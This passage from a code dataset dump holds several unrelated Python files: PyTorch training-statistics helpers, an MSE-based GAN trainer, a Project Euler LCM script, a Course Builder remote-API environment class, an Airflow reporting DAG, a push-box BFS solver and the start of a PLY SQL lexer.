self.dynamic_stats_updater[name] = updater\n else:\n # TODO empty dict or None?\n self.dynamic_stats_storer = None\n self.dynamic_stats_updater = None\n\n def collect_mdl_params_stats(self,mdl):\n ''' log parameter stats'''\n for index, W in enumerate(mdl.parameters()):\n self.w_norms[index].append( W.data.norm(2) )\n self.grads[index].append( W.grad.data.norm(2) )\n if utils.is_NaN(W.grad.data.norm(2)):\n raise ValueError(f'Nan Detected error happened at: i={i} loss_val={loss_val}, loss={loss}')\n\n def collect_stats(self, i, mdl, Xtr,Ytr,Xv,Yv,Xt,Yt):\n ''' log train losses '''\n self.train_losses.append( self.loss(mdl,Xtr,Ytr).item() )\n self.val_losses.append( self.loss(mdl,Xv,Yv).item() )\n self.test_losses.append( self.loss(mdl,Xt,Yt).item() )\n ''' log train errors '''\n self.train_errors.append( self.acc(mdl,Xtr,Ytr).item() )\n self.val_errors.append( self.acc(mdl,Xv,Yv).item() )\n self.test_errors.append( self.acc(mdl,Xt,Yt).item() )\n ''' log parameter stats'''\n for index, W in enumerate(mdl.parameters()):\n self.w_norms[index].append( W.data.norm(2) )\n self.grads[index].append( W.grad.data.norm(2) )\n if utils.is_NaN(W.grad.data.norm(2)):\n raise ValueError(f'Nan Detected error happened at: i={i} loss_val={loss_val}, loss={loss}')\n ''' Update the '''\n if self.dynamic_stats_storer is not None:\n for name in self.dynamic_stats_updater:\n storer = self.dynamic_stats_storer[name]\n updater = self.dynamic_stats_updater[name]\n updater(storer,i, mdl, Xtr,Ytr,Xv,Yv,Xt,Yt)\n\n def get_stats_dict(self):\n stats = NamedDict(\n train_losses=self.train_losses,val_losses=self.val_losses,test_losses=self.test_losses,\n train_errors=self.train_errors,val_errors=self.val_errors,test_errors=self.test_errors,\n grads=self.grads,\n w_norms=self.w_norms\n )\n if self.dynamic_stats_storer is not None:\n stats = NamedDict(stats,**self.dynamic_stats_storer)\n return stats\n\n def append_losses_errors(self,train_loss, train_error, test_loss, test_error):\n self.train_losses.append(train_loss)\n self.test_losses.append(test_loss)\n self.train_errors.append(train_error)\n self.test_errors.append(test_error)\n self.train_accs.append(1.0-train_error)\n self.test_accs.append(1.0-test_error)\n\n####\n\ndef train_cifar(args, nb_epochs, trainloader,testloader, 
net,optimizer,criterion,logging_freq=2000):\n # TODO: test loss\n for epoch in range(nb_epochs): # loop over the dataset multiple times\n running_train_loss = 0.0\n #running_test_loss = 0.0\n for i, data in enumerate(trainloader, 0):\n # get the inputs\n start_time = time.time()\n inputs, labels = data\n if args.enable_cuda:\n inputs, labels = Variable(inputs.cuda()), Variable(labels.cuda())\n else:\n inputs, labels = Variable(inputs), Variable(labels)\n # zero the parameter gradients\n optimizer.zero_grad()\n # forward + backward + optimize\n outputs = net(inputs)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n # print statistics\n running_train_loss += loss.item()\n seconds,minutes,hours = utils.report_times(start_time)\n if i % logging_freq == logging_freq-1: # print every logging_freq mini-batches\n # note: divide by logging_freq because logging_freq mini-batch losses were summed, so this is their average\n print(f'monitoring during training: epoch={epoch+1}, batch_index={i+1}, loss={running_train_loss/logging_freq}')\n running_train_loss = 0.0\n\ndef evalaute_mdl_data_set(loss,error,net,dataloader,enable_cuda):\n '''\n Evaluate the error of the model under some loss and error with a specific data set.\n '''\n running_loss,running_error = 0,0\n for i,data in enumerate(dataloader):\n inputs, labels = extract_data(enable_cuda,data,wrap_in_variable=True)\n outputs = net(inputs)\n running_loss += loss(outputs,labels).item()\n running_error += error(outputs,labels)\n return running_loss/(i+1),running_error/(i+1)\n\ndef extract_data(enable_cuda,data,wrap_in_variable=False):\n inputs, labels = data\n if enable_cuda:\n inputs, labels = inputs.cuda(), labels.cuda()\n if wrap_in_variable:\n inputs, labels = Variable(inputs), Variable(labels)\n return inputs, labels\n\ndef train_and_track_stats(args, nb_epochs, trainloader,testloader, net,optimizer,criterion,error_criterion ,stats_collector):\n enable_cuda = args.enable_cuda\n ##\n for epoch in range(nb_epochs): # loop over the dataset multiple times\n running_train_loss,running_train_error = 0.0,0.0\n running_test_loss,running_test_error = 0.0,0.0\n for (i,(data_train,data_test)) in enumerate( zip(trainloader,testloader) ):\n ''' zero the parameter gradients '''\n optimizer.zero_grad()\n ''' train step = forward + backward + optimize '''\n inputs, labels = extract_data(enable_cuda,data_train,wrap_in_variable=True)\n outputs = net(inputs)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n running_train_loss += loss.item()\n running_train_error += error_criterion(outputs,labels)\n ''' test evaluation '''\n inputs, labels = extract_data(enable_cuda,data=data_test,wrap_in_variable=True)\n outputs = net(inputs)\n loss = criterion(outputs, labels)\n running_test_loss += loss.item()\n running_test_error += error_criterion(outputs,labels)\n ''' print error first iteration'''\n if i == 0: # print on the first iteration\n print(f'--\\ni={i}, running_train_loss={running_train_loss}, running_train_error={running_train_error}, running_test_loss={running_test_loss},running_test_error={running_test_error}')\n ''' End of Epoch: collect stats'''\n train_loss_epoch, train_error_epoch = running_train_loss/(i+1), running_train_error/(i+1)\n test_loss_epoch, test_error_epoch = running_test_loss/(i+1), running_test_error/(i+1)\n stats_collector.collect_mdl_params_stats(net)\n stats_collector.append_losses_errors(train_loss_epoch, train_error_epoch, test_loss_epoch, test_error_epoch)\n 
{"seq_id":"553216840","text":"import time\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torchvision.utils import make_grid\n\n# 'device' is used throughout but was never defined in this file; a standard setup is assumed:\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nclass MSEGAN():\n    def __init__(self, G, D, g_optim, d_optim, criterion):\n        self.G = G\n        self.D = D\n        self.g_optim = g_optim\n        self.d_optim = d_optim\n        self.criterion = criterion\n        self.images = []\n        self.g_losses = []\n        self.d_losses = []\n        self.mse = nn.MSELoss()\n    \n    def train_G(self, real_images):\n        \"\"\" \n        Sample a batch of random noise\n        Generate fake samples using the noise\n        Feed fake samples to D and get prediction scores\n        Optimize G to get the scores close to 1 (means real samples)\n        \"\"\" \n        self.g_optim.zero_grad()\n        \n        noises = Variable(torch.randn(self.batch_size, 128)).to(device)\n        fake_samples = self.G(noises)\n\n        # MSE\n        loss = self.mse(fake_samples, real_images)\n        loss.backward()\n        self.g_optim.step()\n        \n        return loss\n    \n    \n    def train_D(self, real_images):\n        \"\"\"\n        Get a batch of real images\n        Get a batch of fake samples from G\n        Optimize D to correctly classify the two batches\n        \"\"\"\n        self.d_optim.zero_grad()\n        \n        noises = Variable(torch.randn(self.batch_size, 128)).to(device)\n        fake_samples = self.G(noises).detach()\n        \n        # real, close to 1\n        real_pred = self.D(real_images)\n        real_loss = self.criterion(real_pred.squeeze(), Variable(torch.ones(self.batch_size)).to(device))\n        #real_loss.backward()\n        \n        # fake, close to 0\n        fake_pred = self.D(fake_samples)\n        fake_loss = self.criterion(fake_pred.squeeze(), Variable(torch.zeros(self.batch_size)).to(device))\n        #fake_loss.backward()\n        \n        loss = real_loss + fake_loss\n        loss.backward()\n        self.d_optim.step()\n\n        return loss\n    \n    def train(self, data_loader, num_epochs, batch_size): \n        self.batch_size = batch_size\n        \n        self.G.train()\n        self.D.train()\n        \n        noise = Variable(torch.randn(self.batch_size, 128)).to(device)\n        \n        for epoch in range(num_epochs):\n            start = time.time()\n            print('\\n' + 'Epoch {}/{}'.format(epoch+1, num_epochs))\n            print('-' * 20)\n            g_error = 0.0\n            d_error = 0.0\n            for i, data in enumerate(data_loader):\n                img, label = data\n                img = img.to(device)\n                label = label.to(device)\n                d_error += self.train_D(img)\n                g_error += self.train_G(img)\n\n            img = self.G(noise).cpu().detach()\n            img = make_grid(img)\n            self.images.append(img)\n            # average over the i+1 batches processed this epoch\n            self.g_losses.append(float(g_error)/(i+1))\n            self.d_losses.append(float(d_error)/(i+1))\n            print('g_loss: {:.3} | d_loss: {:.3}\\r'.format(float(g_error)/(i+1), float(d_error)/(i+1)))\n            print('Time: {}'.format(time.time()-start))","sub_path":"MSEGAN.py","file_name":"MSEGAN.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
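# MSEGAN.train_G above fits the generator with a plain MSE reconstruction loss rather
# than an adversarial one. For contrast, a sketch of the standard non-saturating
# generator step (assumes the same 128-dim latent and a BCE-style criterion; this is
# an illustration, not the file's method):
import torch

def train_G_adversarial(G, D, g_optim, criterion, batch_size, device='cpu'):
    g_optim.zero_grad()
    noise = torch.randn(batch_size, 128, device=device)
    fake = G(noise)
    # optimize G so that D scores the fakes as real (label 1)
    loss = criterion(D(fake).squeeze(), torch.ones(batch_size, device=device))
    loss.backward()
    g_optim.step()
    return loss.item()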
{"seq_id":"182328187","text":"#############################################################################\n#Problem Set: Project Euler\n#Problem Name: Smallest Multiple\n#Problem Number: 5\n#\n#Question:\n#-----------\n#2520 is the smallest number that can be divided by each of the\n#numbers from 1 to 10 without any remainder.\n#\n#What is the smallest positive number that is evenly divisible\n#by all of the numbers from 1 to 20?\n#############################################################################\n\"\"\"Finds the smallest positive number (or the LCM) which is evenly divisible\nby an arbitrary number, num, and all of its positive descending values\"\"\"\n\n\n#Initialize the list: factors, so it stores what we find in primeFactorization\nfactors = []\n\n\ndef primeFactorization(x):\n    \"\"\"Break a number into its prime factors.\"\"\"\n    #Loop through x starting at 2 to find the smallest factor\n    for factor in range(2, x + 1):\n        #if the variable factor divides x\n        if x % factor == 0:\n            #Store that factor\n            factors.append(factor)\n            \n            #Divide x by that factor \n            x = int(x / factor)\n            \n            #Find the other factors of the derived multiple\n            primeFactorization(x)\n            \n            #If we find a factor, end the loop so we can start over again\n            #on the new multiple\n            break\n\n\ndef lcm(num):\n    \"\"\"Returns the least common multiple of all the numbers between\n    1 and num\"\"\"\n    \n    global factors #Using the factors variable that was globally defined\n    foundFactors = [] #Initializing a place to store prime factors\n    mult = 1 #Initializing a counter\n    \n    #We'll loop through the given num variable backwards starting with the\n    #greatest value\n    for n in range(num, -1, -1):\n        factors = [] #Reinitialize factors every time we need new factors for a new number\n        primeFactorization(n) #Get the constituent primes for our loop number\n        for i in range(0, len(factors)): #Looping through the primes we found in variable factors\n            #If we have a smaller quantity of primes in foundFactors\n            if factors.count(factors[i]) > foundFactors.count(factors[i]):\n                #Find out how many more primes we need\n                amountOfFactors = factors.count(factors[i]) - foundFactors.count(factors[i])\n                #Add that amount of primes to foundFactors\n                while amountOfFactors:\n                    foundFactors.append(factors[i])\n                    amountOfFactors -= 1 #Keeping track of what we added\n    for value in range(0, len(foundFactors)): #Loop through the factors we found in foundFactors\n        mult *= foundFactors[value] #Multiply each of them together\n    print(mult)\n    return mult\n\n\n#When running this code from the command line, if you add an argument after the script name\n#it will run the lcm function (above) with that argument as input.\nif __name__ == \"__main__\":\n    import sys\n    lcm(int(sys.argv[1]))","sub_path":"Modules/project_euler/smallest_multiple_5.py","file_name":"smallest_multiple_5.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"577372062","text":"# Copyright 2013 Google Inc. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS-IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Remote environment manager for extract-transform-load utilities.\"\"\"\n\n__author__ = [\n 'johncox@google.com',\n]\n\nimport logging\nimport sys\nimport traceback\n\nfrom google.appengine.ext.remote_api import remote_api_stub\n\n# Url of help documentation we send the user to if there is an authentication\n# error.\n_AUTH_HELP_URL = 'https://code.google.com/p/course-builder/wiki/EtlAuth'\n# String. Prefix used to detect if a server is running locally.\n_LOCAL_SERVER_PREFIX = 'localhost'\n_LOG = logging.getLogger('coursebuilder.tools.etl')\nlogging.basicConfig()\n\n\nclass Environment(object):\n \"\"\"Sets up the execution environment to use remote_api for RPCs.\n\n As with any use of remote_api, this has three important caveats:\n\n 1. By going through the Remote API rather than your application's handlers,\n you are bypassing any business logic in those handlers. It is easy in\n this way to accidentally corrupt the system receiving your RPCs.\n 2. There is no guarantee that the code running on the system receiving your\n RPCs is the same version as the code running locally. It is easy to have\n version skew that corrupts the destination system.\n 3. Execution is markedly slower than running in production.\n \"\"\"\n\n def __init__(\n self, server, path='/_ah/remote_api', port=None, testing=False):\n \"\"\"Constructs a new Environment.\n\n Args:\n server: string. The full name of the server to connect to\n (myurl.appspot.com).\n path: string. The URL of your app's remote api entry point.\n port: int. When server is 'localhost', must be set to the API port\n of the dev appserver. Ignored otherwise.\n testing: boolean. For tests only, indicates testing mode.\n \"\"\"\n self._path = path\n self._port = port\n self._server = server\n self._testing = testing\n\n def _get_formatted_last_traceback(self):\n return ''.join(traceback.format_tb(sys.exc_info()[2]))\n\n def _get_secure(self):\n \"\"\"Returns boolean indicating whether or not to use https.\"\"\"\n return not self._is_localhost()\n\n def _get_server(self):\n if not self._is_localhost():\n return self._server\n else:\n assert self._port\n return '%s:%s' % (_LOCAL_SERVER_PREFIX, self._port)\n\n def _is_localhost(self):\n \"\"\"Returns True if environment is dev_appserver and False otherwise.\"\"\"\n return self._server.startswith(_LOCAL_SERVER_PREFIX)\n\n def establish(self):\n \"\"\"Establishes the environment for RPC execution.\"\"\"\n if self._testing:\n return\n\n try:\n remote_api_stub.ConfigureRemoteApiForOAuth(\n self._get_server(), self._path, secure=self._get_secure())\n remote_api_stub.MaybeInvokeAuthentication()\n # Must be broad -- we cannot know what types of exceptions App Engine\n # raises due to auth errors. pylint: disable=bare-except\n except:\n _LOG.error(\n 'Unable to authenticate. The most likely cause is that you '\n 'are missing OAuth2 credentials. For help getting those '\n 'credentials, see %s. 
Original error was:\\n%s',\n _AUTH_HELP_URL, self._get_formatted_last_traceback())\n sys.exit(1)\n\n def get_info(self):\n \"\"\"Returns string representation of the environment for logging.\"\"\"\n return 'server: %(server)s, path: %(path)s, port: %(port)s' % {\n 'path': self._path,\n 'port': self._port if self._is_localhost() else '',\n 'server': self._server,\n }\n\n","sub_path":"coursebuilder/tools/etl/remote.py","file_name":"remote.py","file_ext":"py","file_size_in_byte":4280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"582236891","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\naws scene usage stats dag\n\"\"\"\n\n# The DAG object; we'll need this to instantiate a DAG\nfrom airflow import DAG\nfrom airflow.operators.dummy import DummyOperator\nfrom datetime import datetime as dt, timedelta\nfrom automated_reporting import k8s_secrets, utilities\n\ndefault_args = {\n \"owner\": utilities.REPORTING_OWNERS,\n \"depends_on_past\": False,\n \"start_date\": dt(2022, 4, 29),\n \"email\": utilities.REPORTING_ADMIN_EMAILS,\n \"email_on_failure\": True,\n \"email_on_retry\": False,\n \"retries\": 1,\n \"retry_delay\": timedelta(minutes=5),\n}\n\ndag = DAG(\n \"rep_aws_scene_usage_stats_prod\",\n description=\"DAG for aws scene usage stats prod\",\n tags=[\"reporting\"],\n default_args=default_args,\n schedule_interval=\"0 14 * * *\", # daily at 1am AEDT\n)\n\nENV = \"prod\"\nETL_IMAGE = (\n \"538673716275.dkr.ecr.ap-southeast-2.amazonaws.com/ga-reporting-etls:v2.27.7\"\n)\n\n\nwith dag:\n START = DummyOperator(task_id=\"aws-scene-usage-stats\")\n aws_s3_raw_scene_usage_ingestion = utilities.k8s_operator(\n dag=dag,\n image=ETL_IMAGE,\n cmds=[\n \"echo raw scene usage ingestion: $(date)\",\n \"s3-usage-raw-ingestion\",\n ],\n task_id=\"aws_s3_raw_scene_usage_ingestion\",\n env_vars={\n \"REPORTING_DATE\": \"{{ ds }}\",\n },\n secrets=k8s_secrets.db_secrets(ENV)\n + k8s_secrets.s3_server_access_log_bucket\n + k8s_secrets.iam_dea_secrets,\n )\n aws_s3_year_wise_scene_usage_ingestion = utilities.k8s_operator(\n dag=dag,\n image=ETL_IMAGE,\n cmds=[\n \"echo year-wise scene usage ingestion processing: $(date)\",\n \"parse-uri ${REP_DB_URI} /tmp/env; source /tmp/env\",\n \"s3-usage-year-ingestion\",\n ],\n task_id=\"aws_s3_year_wise_scene_usage_ingestion\",\n secrets=k8s_secrets.db_secrets(ENV)\n + k8s_secrets.s3_server_access_log_bucket\n + k8s_secrets.iam_dea_secrets,\n )\n aws_s3_region_wise_scene_usage_ingestion = utilities.k8s_operator(\n dag=dag,\n image=ETL_IMAGE,\n cmds=[\n \"echo region-wise scene usage ingestion processing: $(date)\",\n \"parse-uri ${REP_DB_URI} /tmp/env; source /tmp/env\",\n \"s3-usage-region-ingestion\",\n ],\n task_id=\"aws_s3_region_wise_scene_usage_ingestion\",\n secrets=k8s_secrets.db_secrets(ENV)\n + k8s_secrets.s3_server_access_log_bucket\n + k8s_secrets.iam_dea_secrets,\n )\n aws_s3_ip_requester_wise_scene_usage_ingestion = utilities.k8s_operator(\n dag=dag,\n image=ETL_IMAGE,\n cmds=[\n \"echo ip-requester-wise scene usage ingestion processing: $(date)\",\n \"parse-uri ${REP_DB_URI} /tmp/env; source /tmp/env\",\n \"s3-usage-ip-requester-ingestion\",\n ],\n task_id=\"aws_s3_ip_requester_wise_scene_usage_ingestion\",\n secrets=k8s_secrets.db_secrets(ENV)\n + k8s_secrets.s3_server_access_log_bucket\n + k8s_secrets.iam_dea_secrets,\n )\n START >> aws_s3_raw_scene_usage_ingestion\n START >> aws_s3_year_wise_scene_usage_ingestion\n START >> aws_s3_region_wise_scene_usage_ingestion\n START >> 
aws_s3_ip_requester_wise_scene_usage_ingestion\n","sub_path":"dags/automated_reporting/rep_aws_scene_usage_stats_prod.py","file_name":"rep_aws_scene_usage_stats_prod.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"257755949","text":"'''\nAuthor: Puffrora\nDate: 2021-01-25 22:36:24\nLastModifiedBy: Puffrora\nLastEditTime: 2021-01-25 23:26:21\n'''\n\n\nclass Solution:\n def minPushBox(self, grid):\n\n from collections import deque\n\n row, col = len(grid), len(grid[0])\n tar, box, player = None, None, None\n for i in range(row):\n for j in range(col):\n if grid[i][j] == 'T':\n tar = (i, j)\n grid[i][j] = '.'\n elif grid[i][j] == 'B':\n box = (i, j)\n grid[i][j] = '.'\n elif grid[i][j] == 'S':\n player = (i, j)\n grid[i][j] = '.'\n if tar and box and player:\n break\n \n def get_neighbor(cur_box):\n nonlocal row, col\n x, y = cur_box\n res = []\n for dx, dy in [(0, 1), (0, -1), (1, 0), (-1, 0)]:\n if 0 <= x+dx < row and 0 <= y+dy < col and grid[x+dx][y+dy] == '.':\n res.append((x+dx, y+dy))\n return res\n\n def get_next_state(cur_box, cur_player):\n neighbors = get_neighbor(cur_box)\n\n q1 = deque([cur_player])\n reachable = []\n visited = set([cur_player])\n while q1:\n for _ in range(len(q1)):\n x, y = q1.popleft()\n if (x, y) in neighbors:\n reachable.append((x, y))\n \n for nx, ny in get_neighbor((x, y)):\n if (nx, ny) not in visited and (nx, ny) != cur_box:\n visited.add((nx, ny))\n q1.append((nx, ny))\n \n next_state = []\n bx, by = cur_box\n for rx, ry in reachable:\n symmetry_x, symmetry_y = 2 * bx - rx, 2 * by - ry\n if 0 <= symmetry_x < row and 0 <= symmetry_y < col and grid[symmetry_x][symmetry_y] == '.':\n next_state.append(((symmetry_x, symmetry_y), cur_box))\n return next_state\n\n\n queue = deque([(box, player)])\n seen = set([(box, player)])\n step = -1\n while queue:\n step += 1\n for _ in range(len(queue)):\n cur_box, cur_player = queue.popleft()\n if cur_box == tar:\n return step\n \n for n_box, n_player in get_next_state(cur_box, cur_player):\n if (n_box, n_player) not in seen:\n seen.add((n_box, n_player))\n queue.append((n_box, n_player))\n \n return -1\n\n\n","sub_path":"Leetcode/leetcode1263 推箱子.py","file_name":"leetcode1263 推箱子.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"46158685","text":"# ======================================================================\n# IMPORTES Y PLY\n# ======================================================================\n#importamos la libreria PLY para hacer nuestro analizador lexico.\nimport ply.lex as lex\n#importamos la libreria para llamar al parcer de PLY\nimport ply.yacc as yacc\n#importamos mas librerias que seran utilizadas en el analizador.\n#Estas librerias son compatibles con la licencia ya que son librerias propias de python\nimport re\nimport codecs\nimport os\nimport sys\n# ======================================================================\n# ENTORNO Y PRINCIPAL\n# ======================================================================\nfrom execution.symbol.environment import Environment\nfrom TypeChecker.Database_Types import *\nfrom execution.symbol.typ import *\nfrom execution.main import Main\nfrom execution.symbol.error import *\nTokenError = list()\nListaIndices = list()\nListaAux = list()\n\n# ======================================================================\n# INSTRUCCIONES DDL\n# 
======================================================================\nfrom execution.querie.use import Use\nfrom execution.querie.create import Create\nfrom execution.querie.show_database import Show_Database\nfrom execution.querie.drop_database import Drop_Database\nfrom execution.querie.alter_database import Alter_Database\nfrom execution.querie.add_column import Add_Column\nfrom execution.querie.add_constraint import Add_Constraint\nfrom execution.querie.alter_column import Alter_Column\nfrom execution.querie.alter_table import Alter_Table\nfrom execution.querie.case import Case\nfrom execution.querie.create_t import Create_Table\nfrom execution.querie.create_type import Create_Type\nfrom execution.querie.drop_column import Drop_Column\nfrom execution.querie.drop_constraint import Drop_Constraint\nfrom execution.querie.drop_database import Drop_Database\nfrom execution.querie.drop_t import Drop_Table\nfrom execution.querie.select_fun import Select_Func\n\nfrom execution.symbol.column import Column\n\n# ======================================================================\n# INSTRUCCIONES DML\n# ======================================================================\nfrom execution.querie.insert import Insert\nfrom execution.querie.update import Update\nfrom execution.querie.select_ import Select\nfrom execution.querie.delete import Delete\n\n# ======================================================================\n# EXPRESIONES\n# ======================================================================\nfrom execution.expression.arithmetic import Arithmetic\nfrom execution.expression.greatest import Greatest\nfrom execution.expression.id import Id\nfrom execution.expression.least import Least\nfrom execution.expression.literal import Literal\nfrom execution.expression.neg import Neg\nfrom execution.expression.logic import Logic\nfrom execution.expression.predicates import Predicates\nfrom execution.expression.relational import Relational\nfrom execution.expression.stringop import Stringop\n\n# ======================================================================\n# FUNCIONES MATEMATICAS\n# ======================================================================\nfrom execution.function.mathematical.abs import Abs\nfrom execution.function.mathematical.cbrt import Cbrt\nfrom execution.function.mathematical.ceil import Ceil\nfrom execution.function.mathematical.ceiling import Ceiling\nfrom execution.function.mathematical.degrees import Degrees\nfrom execution.function.mathematical.div import Div\nfrom execution.function.mathematical.exp import Exp\nfrom execution.function.mathematical.factorial import Factorial\nfrom execution.function.mathematical.floor import Floor\nfrom execution.function.mathematical.gcd import Gcd\nfrom execution.function.mathematical.ln import Ln\nfrom execution.function.mathematical.log import Log\nfrom execution.function.mathematical.pi import Pi\nfrom execution.function.mathematical.power import Power\nfrom execution.function.mathematical.radians import Radians\nfrom execution.function.mathematical.random import Randomic\nfrom execution.function.mathematical.round import Round\nfrom execution.function.mathematical.sign import Sign\nfrom execution.function.mathematical.sqrt import Sqrt\nfrom execution.function.mathematical.trunc import Trunc\nfrom execution.function.mathematical.mod import Mod\nfrom execution.function.mathematical.width_bucket import Width_Bucket\n# ======================================================================\n# FUNCIONES 
TRIGONOMETRICAS\n# ======================================================================\nfrom execution.function.trigonometric.acos import Acos\nfrom execution.function.trigonometric.acosd import Acosd\nfrom execution.function.trigonometric.acosh import Acosh\nfrom execution.function.trigonometric.asin import Asin\nfrom execution.function.trigonometric.asind import Asind\nfrom execution.function.trigonometric.asinh import Asinh\nfrom execution.function.trigonometric.atan import Atan\nfrom execution.function.trigonometric.atan2 import Atan2\nfrom execution.function.trigonometric.atan2d import Atan2d\nfrom execution.function.trigonometric.atand import Atand\nfrom execution.function.trigonometric.atanh import Atanh\nfrom execution.function.trigonometric.cos import Cos\nfrom execution.function.trigonometric.cosd import Cosd\nfrom execution.function.trigonometric.cosh import Cosh\nfrom execution.function.trigonometric.cot import Cot\nfrom execution.function.trigonometric.cotd import Cotd\nfrom execution.function.trigonometric.sin import Sin\nfrom execution.function.trigonometric.sind import Sind\nfrom execution.function.trigonometric.sinh import Sinh\nfrom execution.function.trigonometric.tan import Tan\nfrom execution.function.trigonometric.tand import Tand\nfrom execution.function.trigonometric.tanh import Tanh\n\n# ======================================================================\n# FUNCIONES DE AGREGADO\n# ======================================================================\nfrom execution.function.agreggates.avg import Avg\nfrom execution.function.agreggates.count import Count\nfrom execution.function.agreggates.max import Max\nfrom execution.function.agreggates.min import Min\nfrom execution.function.agreggates.sum import Sum\n\n# ======================================================================\n# FUNCIONES BINARIAS\n# ======================================================================\nfrom execution.function.binary.get_byte import Get_Byte\nfrom execution.function.binary.length import Length\nfrom execution.function.binary.md5 import Md5\nfrom execution.function.binary.set_byte import Set_Byte\nfrom execution.function.binary.sha256 import Sha256\nfrom execution.function.binary.substr import Substr\nfrom execution.function.binary.substring import Substring\nfrom execution.function.binary.trim import Trim\n\n# ======================================================================\n# FUNCIONES DE TIEMPO\n# ======================================================================\nfrom execution.function.time.current_date import Current_Date\nfrom execution.function.time.current_time import Current_Time\nfrom execution.function.time.date_part import Date_Part\nfrom execution.function.time.extract import Extract\nfrom execution.function.time.now import Now\n\n# creamos la lista de tokens de nuestro lenguaje.\nreservadas = ['SMALLINT','INTEGER','BIGINT','DECIMAL','NUMERIC','REAL','DOBLE','PRECISION','MONEY',\n 'VARYING','VARCHAR','CHARACTER','CHAR','TEXT',\n 'TIMESTAMP','DATE','TIME','INTERVAL',\n 'YEAR','MONTH','DAY','HOUR','MINUTE','SECOND',\n 'BOOLEAN',\n 'CREATE','TYPE','AS','ENUM','USE',\n 'BETWEEN','LIKE','ILIKE','SIMILAR','ON','INTO','TO',\n 'IS','ISNULL','NOTNULL',\n 'NOT','AND','OR',\n 'REPLACE','DATABASE','DATABASES','IF','EXISTS','OWNER','MODE','SELECT','EXIST',\n 'ALTER','DROP','RENAME','SHOW','ADD','COLUMN','DELETE','FROM',\n 'INSERT','VALUES','UPDATE','SET','GROUP','BY','HAVING','ORDER',\n 'RETURNING','USING','DISTINCT',\n 
'TABLE','CONSTRAINT','NULL','CHECK','UNIQUE',\n 'PRIMARY','KEY','REFERENCES','FOREIGN',\n 'FALSE','TRUE','UNKNOWN','SYMMETRIC','SUBSTRING',\n 'ALL','SOME','ANY','INNER','JOIN','LEFT','RIGTH','FULL','OUTER','NATURAL',\n 'ASC','DESC','FIRST','LAST','NULLS',\n 'CASE','WHEN','THEN','ELSE','END','LIMIT',\n 'UNION','INTERSECT','EXCEPT','OFFSET','GREATEST','LEAST','WHERE','DEFAULT','CASCADE','NO','ACTION',\n 'COUNT','SUM','AVG','MAX','MIN',\n 'ABS','CBRT','CEIL','CEILING','DEGREES','DIV','EXP','FACTORIAL','FLOOR','GCD','IN','LN','LOG','MOD','PI','POWER','ROUND',\n 'ACOS','ACOSD','ASIN','ASIND','ATAN','ATAND','ATAN2','ATAN2D','COS','COSD','COT','COTD','SIN','SIND','TAN','TAND',\n 'SINH','COSH','TANH','ASINH','ACOSH','ATANH',\n 'DATE_PART','NOW','EXTRACT','CURRENT_TIME','CURRENT_DATE',\n 'LENGTH','TRIM','GET_BYTE','MD5','SET_BYTE','SHA256','SUBSTR','CONVERT','ENCODE','DECODE','DOUBLE','INHERITS','SQRT','SIGN',\n 'TRUNC','RADIANS','RANDOM','WIDTH_BUCKET'\n ,'BEGIN','DECLARE','PROCEDURE','LANGUAJE','PLPGSSQL','CALL','INDEX','HASH','INCLUDE','COLLATE', 'CONSTANT', 'ALIAS', 'FOR', 'RETURN', 'NEXT', 'ELSIF',\n 'ROWTYPE', 'RECORD', 'QUERY', 'STRICT', 'PERFORM', 'VAR', 'EXECUTE',\n 'FUNCTION','LANGUAGE','RETURNS','ANYELEMENT','ANYCOMPATIBLE','VOID'\n \n ]\n\ntokens = reservadas + ['FECHA_HORA','FECHA','HORA','PUNTO','PUNTO_COMA','CADENASIMPLE','COMA','SIGNO_IGUAL','PARABRE','PARCIERRE','SIGNO_MAS','SIGNO_MENOS',\n 'SIGNO_DIVISION','SIGNO_POR','NUMERO','NUM_DECIMAL','CADENA','ID','LLAVEABRE','LLAVECIERRE','CORCHETEABRE',\n 'CORCHETECIERRE','DOBLE_DOSPUNTOS','SIGNO_POTENCIA','SIGNO_MODULO','MAYORQUE','MENORQUE',\n 'MAYORIGUALQUE','MENORIGUALQUE',\n 'SIGNO_PIPE','SIGNO_DOBLE_PIPE','SIGNO_AND','SIGNO_VIRGULILLA','SIGNO_NUMERAL','SIGNO_DOBLE_MENORQUE','SIGNO_DOBLE_MAYORQUE',\n 'F_HORA','COMILLA','SIGNO_MENORQUE_MAYORQUE','SIGNO_NOT','DOSPUNTOS','DOLAR',\n 'DOLAR_LABEL'\n ]\n\n\n# lista para definir las expresiones regulares que conforman los tokens.\nt_ignore = '\\t\\r '\n\nt_SIGNO_DOBLE_PIPE = r'\\|\\|'\nt_SIGNO_PIPE = r'\\|'\nt_SIGNO_AND = r'\\&'\nt_SIGNO_VIRGULILLA = r'\\~'\nt_SIGNO_NUMERAL = r'\\#'\nt_SIGNO_DOBLE_MENORQUE = r'\\<\\<'\nt_SIGNO_DOBLE_MAYORQUE = r'\\>\\>'\nt_SIGNO_MENORQUE_MAYORQUE = r'\\<\\>'\nt_SIGNO_NOT = r'\\!\\='\n\nt_PUNTO= r'\\.'\nt_PUNTO_COMA = r'\\;'\nt_COMA = r'\\,'\nt_SIGNO_IGUAL = r'\\='\nt_PARABRE = 